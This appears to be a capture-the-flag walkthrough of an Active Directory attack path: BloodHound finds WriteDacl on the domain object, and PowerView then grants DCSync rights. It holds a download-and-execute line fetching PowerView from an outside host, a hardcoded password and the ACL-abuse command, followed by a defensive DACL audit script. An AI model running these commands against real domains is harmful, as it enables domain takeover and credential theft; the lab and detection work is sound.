BloodHound - Attack Path 1

In this scenario we have our user SVC Alfresco, whose access is shown below.

One of the nested groups is found to be Account Operators, which is a privileged AD group. According to the documentation, members of the Account Operators group are allowed to create and modify users and add them to non-protected groups. Let's note this and look at the paths to Domain Admins. Click on Queries and select Shortest Path to High Value Targets.


One of the paths shows that the Exchange Windows Permissions group has WriteDacl privileges on the Domain object. The WriteDacl privilege gives a principal the ability to modify the object's DACL, i.e. to add new ACEs. This means that a user added to this group can grant themselves DCSync privileges on the domain. Go back to the WinRM shell and add a new user to Exchange Windows Permissions as well as the Remote Management Users group.

Notes:

# Load PowerView into the session
IEX(New-Object net.webclient).downloadstring('http://1.1.1.2/PowerView.ps1')
# Build a credential object for the newly created user
$pass = convertto-securestring 'test123!' -asplain -force
$cred = new-object system.management.automation.pscredential('htb\sp00ks', $pass)
# Grant that user DCSync rights on the domain object via the group's WriteDacl
Add-ObjectACL -PrincipalIdentity sp00ks -Credential $cred -Rights DCSync

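From the defender's side, the abuse above leaves a trace in the domain object's DACL: a non-default principal holding WriteDacl, GenericAll, or the replication extended rights. The following audit script is an added example, not part of the original post or of PowerView; it reads the domain object's security descriptor through System.DirectoryServices and lists principals holding those rights, and it assumes the domain DN `DC=htb,DC=local` and the allowlist of expected principals, both of which should be adjusted for your environment.

```powershell
# Audit the domain object's DACL for WriteDacl / GenericAll / DCSync-capable ACEs.
# Assumption: domain-joined host; adjust $DomainDN and $Expected for your domain.
$DomainDN = 'DC=htb,DC=local'

# Extended-right GUIDs that together make up "DCSync" (well-known schema constants).
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Principals that legitimately hold these rights by default (assumed allowlist).
$Expected = @(
    'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
    'BUILTIN\Administrators', 'HTB\Domain Controllers',
    'HTB\Domain Admins', 'HTB\Enterprise Admins'
)

function Get-DomainDaclFindings {
    param([string]$DistinguishedName, [string[]]$AllowList)
    $entry = [ADSI]"LDAP://$DistinguishedName"
    $rules = $entry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])
    foreach ($rule in $rules) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        $rights = $rule.ActiveDirectoryRights
        $guid   = $rule.ObjectType.ToString()
        $finding = $null
        if ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll)) {
            $finding = 'GenericAll (full control, can grant DCSync)'
        } elseif ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::WriteDacl)) {
            $finding = 'WriteDacl (can add DCSync ACEs)'
        } elseif ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)) {
            if ($rule.ObjectType -eq [Guid]::Empty) { $finding = 'All extended rights (includes replication)' }
            elseif ($ReplicationRights.ContainsKey($guid)) { $finding = $ReplicationRights[$guid] }
        }
        if ($finding) {
            [PSCustomObject]@{
                Principal = $rule.IdentityReference.Value
                Right     = $finding
                Inherited = $rule.IsInherited
                Expected  = ($rule.IdentityReference.Value -in $AllowList)
            }
        }
    }
}

# Anything not on the allowlist (e.g. Exchange Windows Permissions, or a fresh user) is worth a ticket.
Get-DomainDaclFindings -DistinguishedName $DomainDN -AllowList $Expected |
    Where-Object { -not $_.Expected } | Format-Table -AutoSize
```

Run it periodically or after Exchange schema changes, and compare the output against a known-good baseline; a principal like the one created in this walkthrough appearing with a replication right is the signal to investigate.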
